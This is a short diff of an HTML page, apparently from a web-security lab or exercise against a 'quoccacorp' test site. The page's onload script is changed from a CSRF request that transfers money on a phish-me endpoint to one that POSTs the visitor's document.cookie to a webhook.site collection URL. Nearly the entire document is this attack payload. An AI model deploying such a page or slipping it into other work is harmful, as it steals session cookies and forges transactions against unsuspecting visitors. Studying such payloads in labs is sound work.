--- a/index.html
+++ b/index.html
@@ -2,12 +2,12 @@
 <html>
 <meta charset="UTF-8">
 <meta name="viewport" content="width=device-width, initial-scale=1">
-<link rel="stylesheet" href="https://www.w3schools.com/w3css/3/w3.css">
+<!-- <link rel="stylesheet" href="https://www.w3schools.com/w3css/3/w3.css"> -->
 <body onload="myFunction()">
 
     <script>
         function myFunction() {
-            fetch('phish-me.quoccacorp.com/api/transfer?csrf_token=MzUwOQ%253D%253D&username=z5359006&amount=1', {
+            fetch('https://webhook.site/6abeafee-f422-43c3-9188-ae8bdea05c11', {
             method: 'POST',
             mode: 'no-cors',
             body:document.cookie
